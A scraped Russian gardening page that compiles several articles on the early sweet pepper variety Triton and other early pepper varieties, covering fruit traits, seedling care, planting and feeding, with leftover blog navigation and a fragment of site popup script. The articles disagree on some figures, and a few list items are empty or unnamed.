27 просмотров
Рейтинг статьи
1 звезда 2 звезды 3 звезды 4 звезды 5 звезд
Загрузка...

Перец тритон описание

Надежный сорт с рекордной плотность плодов — перец Тритон: характеристика и описание

Раннеспелые виды перца не всегда отличаются особо мясистыми плодами и рекордно толстыми стенками. Зато они одни из первых отдают урожай, снабжая огородников ценными витаминами. Перец Тритон выращивают именно ради этого, к тому же он прекрасно себя чувствует в открытом грунте, неприхотлив и надежен.

Описание и характеристика сорта

Перец болгарский Тритон имеет очень компактные кусты, по форме напоминающие зонтики, высотой 30-50 см. В теплицу его высаживать нет смысла, но на севере можно использовать для уплотнения посадок при выращивании индетерминантных сортов. В центре и на юге России этот сорт предназначен для открытого грунта.

Созревание ультрараннее – от всходов до технической спелости проходит 75-80 дней. Плоды имеют такие характеристики:

  • размер крупный – 100-150 г, по другим данным – до 200 г;
  • в технической спелости бледно-желтый оттенок;
  • в биологической зрелости – красные;
  • форма конусовидная;
  • имеют 4 камеры с семенами;
  • стенки средние – 4-5 мм;
  • в длину около 11 см.

Использовать урожай можно для свежих и консервированных салатов, любых блюд, в том числе приготовления фаршированного перца и лечо. Мякоть сладкая, сочная, с прекрасным вкусом, содержит много витамина С и В.

Преимущества и недостатки

  • очень раннее созревание;
  • прекрасный вкус;
  • крупные плоды;
  • иммунитет к распространенным недугам;
  • универсальное использование;
  • высокое содержание витаминов;
  • хорошая урожайность;
  • прекрасные товарные качества – плоды легко переносят транспортировку на большие расстояния и хранение;
  • неприхотливость.

Минусы:

Урожайность

Усиленный уход может обеспечить до 9,5-10,3 кг плодов с квадратного метра.

Посадка

Посев производят в феврале — марте, чтобы в начале или в конце мая, в зависимости от климата, высадить рассаду на участок.

Сажать лучше в индивидуальные емкости, так как перец плохо переносит пикировку при проращивании рассады в общих ящиках. Рекомендуется использовать торфяные или пластиковые стаканы. Можно сеять в торфяные таблетки, но с ними придется тщательно следить за влажностью: при недостаточном увлажнении таблеток рассада мгновенно гибнет.

Почву готовят из дернового грунта, торфа (или перегноя) и промытого речного песка. Измеряют кислотность. Если она превышает 6,4 рН, добавляют несколько стаканов древесной золы на ведро смеси, пока кислотность не станет нейтральной. Также можно внести минеральные удобрения. Самодельную смесь проливают горячим крепким раствором марганцовки или выкладывают на противень и ставят в духовку при температуре +110 на полчаса.

Семена обеззараживают с помощью специальных препаратов или слабого раствора марганцовки (не крепче 1%). Протравливают их около получаса, затем стимулируют рост «Эпином» по инструкции.

Семена сеют по схеме 3 на 4 см, присыпают тонким слоем почвы и опрыскивают теплой водой. Под пленкой ставят до прорастания в тепло, регулярно проветривают. После всходов держат на подоконнике.

Рассаду в общих ящиках в фазе 2 листьев нужно распикировать.

Выращивание и уход

На грядку высаживают после лука, моркови, бобовых, зерновых культур, кабачков, тыквы, редьки, редиса, капусты.

Поливают теплой водой по необходимости, внося ее строго под корень. Регулярно рыхлят корку на поверхности грунта.

  1. В период развития куста.
  2. Во время цветения.
  3. На протяжении созревания.

Удобрения должны содержать азот, фосфор, калий и небольшое количество других микроэлементов.

LiveInternetLiveInternet

Рубрики

  • РЫБАЛКА (1)
  • (0)
  • АВТОМОБИЛЬ (0)
  • АУДИО (43)
  • здоровье (4)
  • книги (22)
  • музыка (17)
  • ВИДИО (128)
  • Вязание крючком (38)
  • Вязание спицами (50)
  • для дачи (10)
  • здоровье (13)
  • кулинария (12)
  • ВСЁ О СОЛИ (1)
  • ВЫПЕЧКА (830)
  • блины и оладьи (75)
  • хлебопечка (9)
  • булочки, пирожки (82)
  • начинки (8)
  • оформление выпечки (51)
  • печенье (139)
  • пироги несладкие (107)
  • пироги сладкие (76)
  • тесто (94)
  • торты (194)
  • ВЯЗАНИЕ (106)
  • Для роскошных дам (86)
  • программы (11)
  • ВЯЗАНИЕ ДЛЯ ДЕТЕЙ (500)
  • ВЯЗАНИЕ КРЮЧКОМ (2369)
  • береты, шапки (8)
  • жакеты, жилеты (372)
  • костюм (75)
  • летние кофточки, топики (494)
  • пальто (27)
  • пледы (241)
  • подушки (11)
  • прихватки (56)
  • разное (320)
  • сумки (88)
  • тапочки (47)
  • туника (129)
  • узоры (250)
  • шапочки и шляпы (78)
  • шарфы, шали (67)
  • юбки (112)
  • ВЯЗАНИЕ СПИЦАМИ (3994)
  • береты, шапки (52)
  • для мужчин (57)
  • жакеты, жилеты (736)
  • летние кофточки, топики (671)
  • платья, пальто (95)
  • пледы (42)
  • подушки (9)
  • пуловер, свитер, джемпер (534)
  • разное (233)
  • сумки (7)
  • тапочки,носки, варежки (283)
  • туника (159)
  • узоры (780)
  • шали, шарфы (291)
  • юбка (29)
  • ДАЧНЫЕ ВОПРОСЫ (560)
  • удобрения, подкормки (10)
  • малина (1)
  • агротехника (64)
  • баклажаны (10)
  • бахча (3)
  • борьба с вредителями и болезнями растений (46)
  • виноград (13)
  • Газон (2)
  • горох, фасоль. (1)
  • грядки (1)
  • капуста (14)
  • картофель (8)
  • клубника (14)
  • лук, чеснок и пряные травы (28)
  • малина, ежевика (13)
  • морковь (6)
  • огород (3)
  • огурцы (54)
  • перец (9)
  • Плодовые деревья (9)
  • поделки для дачи (52)
  • полезные растения (2)
  • поливные системы (1)
  • разное (45)
  • редиска, редька. (3)
  • свёкла (6)
  • сидераты (9)
  • смородина, крыжовник (9)
  • теплица (3)
  • томаты (51)
  • уход за деревьями (4)
  • уход за кустарниками (4)
  • цветы (66)
  • ДОМ , КВАРТИРА (1)
  • идеи балкона (1)
  • ЗАГОТОВКИ (524)
  • арбуз (3)
  • Ассорти (6)
  • баклажаны (37)
  • варенье (112)
  • грибы (15)
  • Заморозка (4)
  • кабачки (24)
  • капуста (40)
  • Консервы мясные (3)
  • Консервы рыбные (1)
  • огурцы (32)
  • перец (24)
  • помидоры (56)
  • салаты, закуски (32)
  • свёкла (8)
  • соусы, аджика (33)
  • ЗАКОН (3)
  • ЗДОРОВЬЕ (290)
  • для суставов (66)
  • НАРОДНАЯ МЕДИЦИНА (104)
  • скорая помощь (6)
  • ИНТЕРЕСНО (48)
  • ИНТЕРНЕТ (6)
  • КВАРТИРА, ДОМ (0)
  • КИНО (9)
  • КОМНАТНЫЕ РАСТЕНИЯ (1)
  • КОМПЬЮТЕР (186)
  • КУЛИНАРИЯ (1161)
  • блюда из птицы (158)
  • вторые блюда (3)
  • готовим быстро (163)
  • готовим в горшочках (34)
  • готовим в мультиварке (147)
  • грибы (11)
  • десерты (4)
  • КОЛЛЕКЦИЯ РЕЦЕПТОВ (8)
  • мясные блюда (203)
  • напитки (52)
  • первые блюда (8)
  • пикник (23)
  • приправы (6)
  • разное (42)
  • рыбные блюда (164)
  • салаты и закуски (55)
  • сало (21)
  • соус (15)
  • сыры домашние (27)
  • фаршированные овощи (14)
  • МОЛИТВЫ (1)
  • МУДРЫЕ МЫСЛИ (5)
  • НАДО ЗНАТЬ, что. (5)
  • НАСТРОЕНИЕ (29)
  • ПОЛЕЗНЫЕ СОВЕТЫ (135)
  • ПРАЗДНИЧНЫЕ БЛЮДА (76)
  • ПРИРОДА (2)
  • ПРИТЧИ (25)
  • ПСИХОЛОГИЯ (6)
  • РУКОДЕЛИЕ (62)
  • САЙТЫ МУЗЫКА (3)
  • САЙТЫ НУЖНЫЕ (21)
  • САЙТЫ ПО ВЯЗАНИЮ (12)
  • САЙТЫ ПО КУЛИНАРИИ (16)
  • САЙТЫ ПО МЕДИЦИНЕ (2)
  • СТИХИ (38)
  • ТЕЛЕФОН (1)
  • ШИТЬЕ (207)

Цитатник

Красивые узлы на одежде по типу макраме Видео смотреть здесь

Тапочки следки на двух спицах без швов

Пуловер Corrina от Ann McCauley. http://www.ravelry.com/patterns/library/corrina Опубликов.

Пуловер (ж) 04*688 Phildar №5075 http://parijanka.info/2010-01-25-12-31-42/6314-pulover-zh-046.

КРАСИВАЯ КОКЕТКА СПИЦАМИ Автор: Юлия Мельниченко Источник .

Ссылки

Метки

Музыка

Поиск по дневнику

Подписка по e-mail

Статистика

ПЕРЕЦ СОРТ ТРИТОН

Среда, 27 Января 2016 г. 13:11 + в цитатник

ПЕРЕЦ СОРТ ТРИТОН

Перец Тритон относится к категории сверхранних. Он отличается высокой устойчивость к капризам погоды, которые часто случаются в условиях Подмосковья. Помимо этого, растения данного сорта прекрасно адаптировались к условиям юга Сибири.

Выращивают перец Тритон в условиях открытой высадки в грунт, а земледельцы северных регионов смогли добиться рекордных показателей урожайности, которые практически не уступают южным сортам. Только с одного куста можно снять до 50 и более сочных плодов. Плоды перца Тритон имеют форму конуса, обладают не очень толстыми стенками и достигают массы до 150 граммов.

По достижении фазы технической зрелости, окраска плодов желтого цвета, в фазе биологического созревания они становятся красными. Перцы сорта Тритон отлично подходят для любой переработки и консервирования. Для того чтобы растения дали особенно высокий урожай, следует использовать при выращивании их некоторую особенность.

Когда рассада высаживается непосредственно в грунт, у кустиков следует обязательно удалить первую завязь. Если этого не сделать, развитие куста будет происходить крайне плохо, и о большом урожае говорить не придется, поскольку плодов образуется очень мало.

Перец тритон

Перец сладкий на сегодня стал одним из повседневных овощей, который используется в кулинарии. Этот овощ выращивается на каждом садовом участке, в самых различных регионах. Если правильно подобрать сорт, то перец можно вырастить практически везде и собрать не маленький урожай.

Перец тритон характеристика и описание сорта

Перец представитель семейства пасленовых. Плоды пустотелые, с множеством семян внутри, различных цветов. Привезены из Америки, являются многолетними растениями.

В России из-за климатических условий выращивается только сезонно. В южных регионах дает более богатый урожай на открытом грунте. В северных регионах требует постоянного или временного укрытия.

Перец Тритон, его характеристики и описание. Раннеспелый сорт, период созревания 75-80 дней. Куст невысокий, с виду напоминает зонтик, который защищает плоды от прямых солнечных лучей. Плод крупный, четырехдольный, толщина стенок средняя где-то 4-5 мм.

Форма плода конусовидная, длина 11-15 см. Масса среднего перца около 150-200 гр. Цвет в технической спелости – желтый, в биологической – красный. Данный сорт подходит для консервации, в кулинарии, а также для приготовления в свежем виде.

Агротехника

Семена на рассаду нужно сажать за 60-65 дней до предположительной высадки рассады в грунт. Температура для прорастания семян должна быть 26 градусов. Рассаживают рассаду после появления первых настоящих листочков, в емкости от 0,2 л.

После пересадки перец может остановиться в росте, это нормально, так как он не любит пересадку. Чтобы рассада лучше перенесла стресс можно опрыскивать растения специальным препаратом, который называется «Эпин».

Высаживают перец на открытое место в зависимости от региона. Некоторые садоводы высаживают в мае под пленку или укрывной материал, ну а некоторые ждут более теплой погоды. Сажают по 6 штук на один кв. метр, не углубляя в лунку, приблизительно на ту же глубину, что и в емкости. Желательно удалять первую завязь при высадке в почву, для хорошего развития куста.

Участок под посадку выбирают с осени, желательно с южной стороны дома. Такое расположение защищает растение от ветра и солнечных лучей в летний зной. Перец предпочитает легкую, рыхлую и удобренную почву.

Очень требователен к свету, теплу и влаге, после полудня желательно чтобы была теневая сторона. Если будет нехватка света, то завязи опадут, а растения вытянутся. Сажают перец после моркови, свеклы, бобовых культур. Не желательно сажать рядом с огурцами.

Сорт перца тритон

Уход за перцем и его подкормка. После высаживания перец поливают через пару дней, при этом присыпая землю древесными опилками или засохшей травой. Затем полив производится 1 раз в неделю до появления первых завязей.

Далее полив увеличивается до одного раза в пять дней. Также необходимо рыхлить почву, для улучшения роста и доступа кислорода. Делать это желательно утречком, после вечернего полива. Подкармливают перец три раза.

По растению легко можно понять какого вещества ему не хватает. К примеру:

  • если листья скручиваются, это говорит о нехватке калия;
  • если листочки стали матовые, с сероватым оттенком, то нехватка магния;
  • если листва приобрела фиолетовый цвет с обратной стороны, то не хватает магния;
  • ну а если стала опадать листва и цветочки, то это говорит о переизбытке азота.

При теплой осени можно продлить плодоношение полив их специально приготовленным раствором. На 10 литров воды берут 50 грамм суперфосфата, 15 грамм хлористого калия и 15 грамм аммиачной селитры.

Заключение

Помните, что перец легко переопыляется и если вы планируете собрать семена с того или иного сорта, то сажайте их разных местах вашего садового участка. Тоже самое касается и горького перца, чтобы весь перец не был горьким, его нужно сажать отдельно от всех перцев.

Ультраскороспелые сорта перцев для теплицы

Ранние сорта сладких перцев для теплиц вырастить довольно просто. Достаточно соблюдать все правила агротехники.

Польза ранних сортов сладкого перца

Разновидностей очень много. Они определяются по различным критериям.

  • По месту выращивания – тепличные, для открытого грунта (или универсальные).
  • По быстроте созревания плодов – ультраскороспелые (ранние), среднеспелые, позднеспелые.
  • По высоте стебля.

Как правило, многие фермеры отдают предпочтение именно ранним сортам сладкого перца.

Овощ является одним из самых полезных. Ультраскороспелые сорта для теплиц содержат в себе массу витаминов. В первую очередь – это каротин и витамин С.

Миниатюрные ультраскороспелые плоды часто используют в кулинарии. Из них получаются очень красивые блюда.

В теплице плоды растений созревают довольно рано. При этом они имеют очень привлекательный внешний вид и относительно долго хранятся. Их нетрудно выращивать. Для этого достаточно обладать минимальными знаниями правильной посадки и ухода.

Ультраскороспелые перцы

Такие ультраскороспелые растения прекрасно развиваются и в условиях открытого грунта.

Кардинал

Этот ранний сладкий вид предназначен исключительно для выращивания в теплице. В высоту он не превышает 1м. Очень мясистые плоды. Их цвет необычен – от зеленого и красного до темного фиолетового оттенка. Это не чистый сорт, он относится к гибридам.

Денис

Его по праву можно назвать ультраскороспелым. Этот сладкий перец вызревает в теплице за минимальное количество времени – 100 дней. Плоды очень крупные и плотные, по весу достигают 400 г. Сам куст небольшой по высоте, очень компактный.

Клаудио

Этот ультраскороспелый вид предназначен для больших теплиц. В невысоких пленочных постройках растению будет тесно. Его плоды большой формы, бордового оттенка. Их вес колеблется от 200 до 250 г. Само растение габаритно. В высоту может достичь более 125 см. Куст раскидистый, имеет много ответвлений.

Атлант

Это растение идеально растет в условиях небольшой теплицы. Ранний сорт перца не вырастает выше 85 см и дает при этом хороший урожай. Плоды мясистые, сочные и крупные. Цвет по созреванию будет зеленым. С течением времени перец будет приобретать красный оттенок.

Какаду

Вырастает очень большим (до 1,5 м) и раскидистым. Для выращивания этого раннего сорта нужна большая теплица. Это ультраскороспелый вид, для полного созревания ему достаточно 100 дней. Вес плодов очень большой. При правильном уходе – 500 г.

Мадонна

Это гибридный ультраскороспелый представитель. Плоды выростали достаточно большими, в весе они достигают примерно 200 г. Перцы мясистые, с толстыми стенками в 7 мм. В состоянии полной зрелости плод имеет насыщенный желтый цвет. В высоту растение невелико

.

Геракл

Отличается высоким сроком хранения и быстротой созревания. Именно поэтому данный ранний вид часто выращивают в теплицах на продажу. Плоды довольно мясистые и большие, весом до 300 г. В целом растение непривередливо, хорошо противостоит болезням.

Белоснежка

Это растение относится к ультраскороспелому сорту. Но он предназначен только для пленочных теплиц. В других условиях растение будет развиваться, но урожайность при этом снизится. Плоды окрашены в белый оттенок. По мере созревания перцы краснеют. Высота куста маленькая.

Латинос

Это ультраскороспелый сорт сладкого перца. В правильных тепличных условиях он дает большой урожай – до 14 кг с 1 квадратного метра. Куст высокорослый (1м), но компактный. Спелые плоды имеют ровный красный оттенок. Это один из лучших гибридных представителей.

Карлик

Этот сорт отличается своим небольшим ростом. Обычно растение достигает в высоту не более 35-40 см. Тем самым оно и заработало свою популярность (за ним гораздо проще ухаживать). Плоды у этого перца весят около 80 г, но при этом они довольно мясистые.

Лумина

Очень популярная ультраскороспелая разновидность. К болезням сорт очень устойчив. Изменение условий для него также не помеха. По высоте небольшой, компактен в росте. Плоды маленькие, в весе не превышают 115 г. Цвет различен – белый, золотой, зеленый, розовый. Оттенки бледные.

Винни-Пух

Высота растения не превышает 30 см. Плоды небольшие, весят они всего 50 г. Но вид довольно популярен. Его часто используют для приготовления изысканных блюд. Еще один большой плюс – одновременное созревание.

Айвенго

Этот ранний вид любит тепло и влагу. Относится к среднерослым разновидностям, но в целом он очень компактный. Урожайность хорошая, но при соблюдении правильных условий – 7,5 кг с 1 м в квадрате. Цвет перца может сочетаться, а может быть ровным. В основном, это оттенки красного и оранжевого цветов.

Маринкин язычок

Плоды этого ультраскороспелого вида очень рано созревают. При этом его устойчивость к болезням и изменениям в окружающей среде довольно высока. Растение среднего роста (около 60 см). На одном кусте вырастает до 15 плодов весом в 240 г. Окрас ровный, темно-красного оттенка.

Тритон

Этот ранний представитель отличается высокой степенью устойчивости к воздействию болезней, вредителей, изменению условий и так далее. Очень высокая урожайность – около 40 мелких или средних плодов на кусте. Плоды довольно мясистые, толщина стенки 6 мм. Цвета – красный, желтый, оранжевый.

Итак, мы рассмотрели лучшие ультраскороспелые сорта перцев для тепличного выращивания. Теперь рассмотрим критерии выбора семян.

Пять критериев выбора

При выборе семян ультраскороспелого сорта перцев для тепличного выращивания часто возникают вопросы и сомнения.

Прежде чем приобретать семена, ознакомьтесь со следующей информацией:

  1. среда выращивания;
  2. созревание плодов;
  3. размер растения;
  4. подверженность заболеваниям или вредителям;
  5. региональные особенности.

Если вы планируете посадить растение в теплице, убедитесь, что указанная на упаковке среда выращивания семян соответствует этому. Каждый сорт рассчитан на разные условия.

Срок созревания плодов также важен. Если вы хотите, чтобы плод созрел быстро, выбирайте ультраскороспелые сорта.

Размер растения имеет большое значение. Особенно, если сладкий перец будет расти в теплице. Выбирайте компактные ранние сорта. Это значительно облегчит дальнейший уход за растением и не повлияет на его урожайность.

Важнейший критерий – подверженность заболеваниям или вредителям. Ранние растения имеют разный уровень уязвимости. Конечно же, перевес на стороне стойких сортов.

Важны и региональные особенности ранних сортов. Чтобы семена сладкого перца развивались правильно, в теплице нужно создать нужные условия.

Чистый сорт или гибрид

Чтобы было легче определиться с выбором, поговорим об отличиях чистых и гибридных образцов растений.

Ранние сорта растут в теплице гораздо лучше, чем в открытом грунте.

Чистые сорта – это результат длительного качественного отбора семян. Фермеры выращивают растения, затем выбирают лучшее из них:

  • самое высокое;
  • самое мясистое;
  • с самыми вкусными и крупными плодами.

Из плодов этого растения вынимаются семена. Затем вручную высаживается рассада. Отборочный круг повторяется до тех пор, пока результат не станет идеальным. Так и появляется чистый сорт.

Ультраскороспелые гибриды сладкого перца – это результат скрещивания в теплицах ранних сортов. Такие образцы растений отличаются:

  • толстым стеблем;
  • высоким урожаем;
  • качественными плодами;
  • привлекательным видом;
  • компактностью куста;
  • выносливостью к болезням;
  • устойчивостью к вредителям.

Другими словами – они одноразовые. Для посадки на следующий год нужно будет приобретать новые семена. При этом следует учитывать их немалую стоимость.

Правильная посадка ранних сортов

Семена тепличного ультраскороспелого сладкого перца лучше всего сначала прорастить. Чтобы рассада получилась качественной, нужно обратить внимание на следующие параметры:

Емкость обязательно выбирайте заранее. Для начального посева вполне подойдет неглубокая посудина. В дальнейшем ростки нужно будет пересаживать. В этом случае понадобится контейнер большей формы, желательно торфяной. Можете использовать деревянные ящики.

Грунт для посадки раннего перца должен быть хорошо увлажненным. При этом не должно быть избытка воды. Лучше всего щедро опрыскивать землю с семенами из пульверизатора. Так вы сможете контролировать количество влаги. Если вы сильно залили землю, просто смешайте ее с сухим грунтом.

Расстояние играет большую роль в посадке семян. Проросший перец будет мешать друг другу и вытягиваться, если не соблюдать правильный интервал. Сажайте семена на двухсантиметровом расстоянии друг от друга. Тогда рассада будет развиваться свободно и правильно.

Важнейшая роль принадлежит температуре. Тепличные ранние сорта сладких перцев нуждаются в ее стабильности. Выращивая рассаду, следите за показателем термометра. Температура должна держаться на пометке 21. Это влияет на будущий урожай растения.

Нужно обязательно пересаживать рассаду сладкого перца. Тепличные ультраскороспелые сорта нуждаются в двойной пересадке: первая осуществляется в емкости, вторая – непосредственно в тепличный грунт. Когда рассада взойдет и окрепнет (около 12 недель), аккуратно пересадите ее в большие торфяные емкости. Это нужно для хорошего развития корней. Так они становятся крепче и ветвистей.

В теплицу рассаду сладкого перца ранних сортов нужно сажать на расстоянии полуметра друг от друга. Для правильного дальнейшего развития за растениями нужно ухаживать. Поговорим о правилах.

Посадка ультраскороспелых перцев

Ранние тепличные сорта сладких перцев, даже неприхотливые, нуждаются в правильном уходе. Чтобы урожайность растения оправдала ожидания, нужно выполнять маленькие хитрости.

  1. Подвязка кустов. Высокие габаритные ранние перцы могут ломаться в ходе роста. Чтобы растение не испортилось, ему нужно помочь. Если перец достигает в высоту 60 см – подвязывайте его.
  2. Полив. Не забывайте вовремя его осуществлять. Ранние сорта сладких перцев любят влагу.
  3. Высокая урожайность. Обязательно удалите первые завязи для того, чтобы повысить урожайность.
  4. Температура. Каждый сорт перца имеет свои температурные предпочтения. Если вы выращивание несколько ранних сортов перца в одной теплице, нужна средняя температура. Самый оптимальный показатель – 18 градусов. Придерживайтесь его для хорошей урожайности.
  5. Формирование. Слишком раскидистые сорта ультраскороспелых тепличных перцев нужно формировать. Для этого с куста удаляются лишние побеги. Таким образом, вы повысите урожайность растения и защитите его от многих болезней.

Итак, мы рассмотрели правила выбора, посадки и ухода ранних сортов сладкого перца для теплиц. Соблюдая их, вы легко сможете вырастить крупные мясистые плоды самостоятельно.

Сорта сладкого перца ранние: описание, характеристики, особенности выращивания

Ароматный и полезный сладкий перец сегодня выращивают садоводы и огородники практически во всех регионах нашей страны. Среди овощных культур он выделяется большим содержанием витамина C. Его в перце в восемь раз больше, чем в помидорах и луке, вдвое больше, чем черной смородине. Кроме того, в нем содержится каротин (витамин А), витамин РР.

Перец болгарский любят и взрослые, и дети. Он добавляет изысканный аромат в салаты, прекрасно подходит для приготовления горячих блюд, незаменим при консервировании овощей.

Сегодня отечественные и зарубежные селекционеры вывели многочисленные сорта сладкого перца. Ранние вызывают особый интерес огородников. Они позволяют получить отличный урожай не только в благоприятных южных регионах, но и в сложных климатических условиях Сибири и Урала. Семена перца сладкого раннего толстостенного (сибирской селекции) все чаще стали появляться на прилавках специализированных магазинов нашей страны.

Что выбрать – гибрид или сорт?

Этот показатель важен для тех, кто чаще использует собственные семена. Если выбранные вами семена перца сладкого раннего толстостенного имеют на упаковке отметку F1, то это означает, что с данного растения не следует заготавливать семена. Этим знаком обозначают гибриды в первом поколении. Они при семенном размножении не наследуют сортовых признаков. Иными словами, даже если вы соберете семена полюбившегося гибрида, растения, выросшие из них, могут быть совершенно не похожими на те, которые понравились вам в прошлом сезоне.

Тем не менее гибриды имеют определенные преимущества. Среди них:

  • крупные плоды и высокая урожайность;
  • более высокая устойчивость к болезням, нежели у сортовых растений.

Атлантик F1

Гибрид крупноплодный, раннего созревания. Кусты этого растения высокорослые — до 105 см в высоту. Перцы очень крупные и мясистые. Их масса достигает 450 граммов. Имеют вытянутую, бочковидную форму. Такой гибрид прекрасно развивается в открытом грунте. Он устойчив к различным болезням.

Сроки созревания

Опытные овощеводы знают, что лучше всего сажать растения с разным сроком созревания. В этом случае вам удастся на протяжении всего сезона получать свежие плоды. Однако в северных регионах вряд ли получится вырастить поздние сорта без использования теплиц. Поэтому целесообразнее использовать ранние сорта перца сладкого для открытого грунта, способные давать хорошие урожаи в условиях короткого и прохладного лета.

Ниже приведем ориентировочные сроки:

  • ранние сорта созревают в течение 80-100 дней;
  • гибриды и среднеспелые порадуют вас урожаем через 115 дней;
  • поздним сортам для созревания понадобится до 150 дней.

Семена перца сладкого раннего толстостенного (сибирской селекции) следует сеять в начале февраля, а для южных регионов – в первой половине января. В этом случае перцы, которым для созревания требуется 150 дней, успеют дать урожай в июле. Если вы собираетесь покупать семена сладкого перца, рекомендуем обратить внимание на сорт Бивень от компании «Сибирский сад».

Это крупноплодный ранний сорт — результат работы селекционеров Сибири. Он подходит для теплиц и для грунта. Куст высотой около пятидесяти сантиметров, с очень тяжелыми и крупными плодами (до 300 г), длиной до 25 см. Стенки их — толщиной восемь миллиметров. Сорт высокоурожайный — на одном растении вызревает двенадцать плодов. Окраска — ярко-красная. Плоды очень сочные, имеют приятный сладковатый вкус с тонким яблочным ароматом.

Ранние сорта сладкого перца сладкого для открытого грунта — перец Ерошка

Очень популярный сорт. Это сладкий перец, ранний, толстостенный. Куст считается среднерослым — около пятидесяти сантиметров в высоту. В период созревания плоды окрашены в светло-зеленый цвет, при полном созревании — оранжево-красные, массой около 180 г, кубовидной формы.

Характеризуется дружным и ранним плодоношением. На кусте вызревает до шестнадцати плодов. Сорт идеально подходит для посадок ленточным способом (расстояние 12-15 см). Вполне устойчив к табачной мозаике, вершинной гнили, вертициллезу.

Фунтик

Раннеспелый, довольно рослый куст. Во время созревания перцы окрашены в насыщенный зеленый цвет, после созревания – красные, конусообразные, крупные — масса 180 граммов, стенки толщиной семь миллиметров.

Отличается активным созреванием урожая и великолепным вкусом. С куста снимают до восемнадцати перцев. Устойчив к табачной мозаике и вертициллезу.

Сорт раннеспелый. Высота 60 см. Красные плоды, массой до 180 граммов.
Один куст дает до пятнадцати плодов, характеризующиеся высокими вкусовыми качествами. Отлично подходит для уплотненной посадки.

Чардаш

Можно сказать, что это самый ранний перец сладкий. Высота кустов 70 см. Плоды оранжево-красные, тяжелые (до 220 г), конусовидной формы, стенки толщиной 6 мм.
Чардаш отличается активным и дружным плодоношением, плоды очень красивы, пригодны к употреблению как в свежем виде, так и после обработки. На кусте созревает семнадцать плодов.

Буратино

Многие ранние сорта перца сладкого (для открытого грунта) относятся к тонкостенным. К таковым причисляют и Буратино. Стенки его — толщиной пять миллиметров. Высота куста — семьдесят сантиметров. В период созревания плоды окрашены в темно-зеленый цвет, при полном созревании они приобретают ярко-красный окрас.

Имеют конусовидную форму, длинные, массой до 120 граммов.
Поспевает дружно, плоды отлично хранятся, пригодны для термической обработки. Устойчивы к большинству заболеваний.

Ранние высокоурожайные сорта сладкого перца – Лумина

Наверное, с нами согласятся многие овощеводы – это один из наиболее популярных в средней полосе ранних сортов перца. Отличается невысокими кустами (штамбовыми). Плоды средние по размеру либо мелкие (не более 115 г), бледно-зеленого или золотисто-белого цвета, иногда имеющие розоватый оттенок. Плоды обладают приятным сладковатым вкусом и слабым ароматом.

Некоторые сорта сладкого перца (ранние) хорошо знакомы не только овощеводы, но и рядовым покупателям. Пример тому – Лумина. Этот сорт довольно часто выбирают фермеры, поэтому на прилавках овощных магазинов он присутствует постоянно. Данный сорт неприхотлив, не требует особого ухода и дает большой урожай даже в самое сухое лето, при недостаточном поливе. Но в этом случае у перца может появиться горьковатый, немного острый вкус. Плоды хранятся до 3,5 месяцев, не теряя торгового вида, отлично переносят транспортировку.

Айвенго

Ранние сорта перца болгарского (сладкого) становятся все более востребованными с каждым годом. Один из них – Айвенго. Он выведен не очень давно, но его уже по достоинству оценили многие дачники.

Так называемой спелости технической плоды достигают уже на 103 день. В это время они еще не имеют в полной мере того вкуса и аромата, которым наделены полностью спелые перчики, тем не менее в это время они уже пригодны к употреблению. На этой стадии окраска плодов — кремовая или белая. После окончательного созревания, они получают насыщенный красный цвет. Вес плода не превышает 130 граммов. Форма — вытянутая, конусовидная, узкая. Это толстостенный сорт — толщина стенки 9 мм.

Внутри плоды разделены перегородками на три-четыре камеры, имеют большое количество семян. Кусты полуштамбовые, компактные, имеющие среднюю высоту. Их не обязательно специально формировать. Растение удобно обрабатывать и собирать плоды.

Айвенго устойчив к основным болезням, но в затяжную весну или засушливое лето урожай может значительно снизиться. Сорт идеален для теплиц. При правильном уходе дает урожай в 7-8 кг с одного метра квадратного.

Маринкин язычок

Не все сорта сладкого перца (ранние) могут давать большие урожаи в сложных погодных условиях. Этот сорт, выведенный днепропетровскими селекционерами, стойко переносит все природные капризы, и гарантированно радует высоким урожаем.
Обильное плодоношение (более 15 плодов) заставляет, подвязывать растение к опоре.

Кусты среднерослые, высотой шестьдесят сантиметров. Плоды весом до 195 граммов. Форма конусовидная, узкая, слегка изогнутая. Спелые перцы имеют темно-красный или вишневый цвет, приятный сладкий вкус и аромат. Мякоть хрустящая и очень сочная. Толщина стенки в верхней части 13 мм, у плодоножки 8 мм.

Тритон

Суперранний сорт, так же хорошо, как и предыдущий, переносящий неблагоприятную погоду. Легко переносит низкую температуру и дожди. Сорт высокоурожайный.
Плоды среднего или мелкого размера, масса не превышает 140 граммов. При этом на одном кусте завязываться до сорока пяти плодов. Форма их немного округлая, конусовидная. Спелые перцы оранжевого, желтого или красного цветов, с ярко выраженным ароматом и приятным вкусом.

Сибирский князь

Сорта сладкого перца (ранние) сибирской селекции предназначены для выращивания в Сибири и на Урале. Данный высокоурожайный сорт создан для выращивания в открытом грунте. Плоды глянцевые, конусовидной формы. Масса от 90 до 150 граммов. В технической спелости плоды имеют желтоватую мякоть и кожицу. Зрелые плоды красные. Мякоть вкусная, сочная, ароматная, мясистая. Урожайность — до 4,2 килограмма с одного метра.

Колобок

Компактный раннеспелый сорт. Он выращивается в грунте, но может расти и в пленочном укрытии. Куст низкорослый, на нем созревают 4-камерные плоды с очень нежной мякотью, толщина стенок которых составляет 9 мм. Вес одного перчика — 90 граммов.

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
